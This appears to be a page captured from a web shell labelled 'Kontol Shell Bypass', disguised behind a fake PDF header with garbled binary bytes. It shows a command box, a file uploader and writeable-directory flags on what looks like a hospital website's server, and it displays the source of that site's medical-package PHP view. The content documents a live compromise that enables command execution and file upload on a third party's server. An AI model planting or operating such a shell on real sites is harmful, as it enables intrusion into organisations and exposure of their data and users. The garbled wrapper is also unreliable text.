%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/application/views/medical_package_detail.php
<?php include(APPPATH . 'views/includes/header.php'); ?>

<!--BreadcrumbsStart-->
<section id="breadcrumbs">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <h1><?php echo $page_title; ?></h1>
            </div>
            <div class="col-md-12">
                <ul>
                    <li><a href="/">Sharda Hospital</a></li>
                    <li><a href="<?php echo site_url('medicalpackage'); ?>">Medical Packages</a></li>
                    <li><?php echo $page_title; ?></li>
                </ul>
            </div>
        </div>
    </div>
</section>
<!--BreadcrumbsEnd-->

<!--MainDIV-Start-->
<section id="main">
    <div class="container">
        <div class="row">
            <!--CenterDIV-Start-->
            <div class="patient_stories medical_package_detail line-height24">
                <div class="col-md-9 col-sm-8 main-content">
                    <h2 class="h2inner mrg-bot30"><?php echo $page_title; ?></h2>
                    <h4><strong>Cost: INR <?php echo number_format($package['MedicalPackagePrice']) . '/-'; ?></strong></h4>
                    <?php echo $package['MedicalPackageDescription'] ?>					
                </div>
            </div>
            <!--CenterDIV-End-->

            <!--RightNAV-Start-->
            <div id="right_nav">
                <div class="col-md-3 col-xs-12 col-sm-4">
                    <?php include(APPPATH . 'views/includes/usp_slider_side.php'); ?>					


                    <div class="clearfix"></div>

                    <!-- Medical Packages -->
                    <?php include(APPPATH . 'views/includes/medical_packages_side.php'); ?>
                		

                </div>
                <div class="clearfix"></div>
            </div>
            <!--RightNAV-End-->


        </div>
    </div>
</section>
<!--MainDIV-End-->


<!--HealthCare-start-->
<section id="health-care">

    <!--HealthCare--slider-->	


    <script>
        $(document).ready(function () {
            $('.carousel[data-type="multi"] .item').each(function () {
                var next = $(this).next();
                if (!next.length) {
                    next = $(this).siblings(':first');
                }
                next.children(':first-child').clone().appendTo($(this));

                for (var i = 0; i < 2; i++) {
                    next = next.next();
                    if (!next.length) {
                        next = $(this).siblings(':first');
                    }

                    next.children(':first-child').clone().appendTo($(this));
                }
            });
        });
    </script>


    <!--HealthCare--slider-->	

</section>			
<!--HealthCare-end-->

<!--PatientsStories--Start-->
<!--
<section id="patients_stories" class="mrg-bot50">
        <div class="container">
                <div class="row">
                        <div class="col-md-12">
                                <div class="health-care text-center">
                                        <span><a href="<?php echo base_url(); ?>PatientStory"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
                                          <path class="fil0" d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
                                        </svg></a></span>
                                        <h2 class="home_h2">Success Stories</h2>
                                        <p>Complete recovery of the patients from ailments is the prime objective of the doctors at Sharda Hospital. Let’s hear stories of successful treatment.</p>
                                </div>
                        </div>	
                </div>	
        </div>
        <div class="container">
                <div class="row">
<?php foreach ($patient_stories as $patient_story) { ?>
                            <div class="col-md-3 col-sm-6 col-xs-12">
                                    <h3><?php echo strip_tags($patient_story['PatientStoryTitle']); ?></h3>
                                    <p><?php echo substr(strip_tags($patient_story['PatientStoryContent']), 0, 140); ?></p>
                                    <ul class="storybox">
                                            <li>
                                                    <a href="<?php echo base_url(); ?>PatientStory/<?php echo $patient_story['PatientStoryID'] ?>" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
                                                    <path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
                                                    </svg></a>
                                                    <span class="storyshowhide">Visit the story</span>
                                            </li>
                                    </ul>
                            </div>
<?php } ?>
        
                        
                </div>
        </div> 
</section>
-->
<!--PatientsStories--End-->


<!--NotFromIndia-Start-->
<section id="not_from_india">
    <div class="container">
        <div class="row">
            <div class="col-md-12 text-center">
                <h2>Not From India? No Problem.</h2>
                <p>We can help plan your visit.</p>
                <a href="<?php echo site_url('international-patients'); ?>" class="button">Learn more</a>
            </div>
        </div>
    </div>
</section>
<!--NotFromIndia-End-->

<?php include(APPPATH . 'views/includes/bottom_boxes.php') ?>

<?php include(APPPATH . 'views/includes/quick_links.php') ?>

<?php include(APPPATH . 'views/includes/subscribe.php') ?>

<?php include(APPPATH . 'views/includes/footer.php'); ?>

Kontol Shell Bypass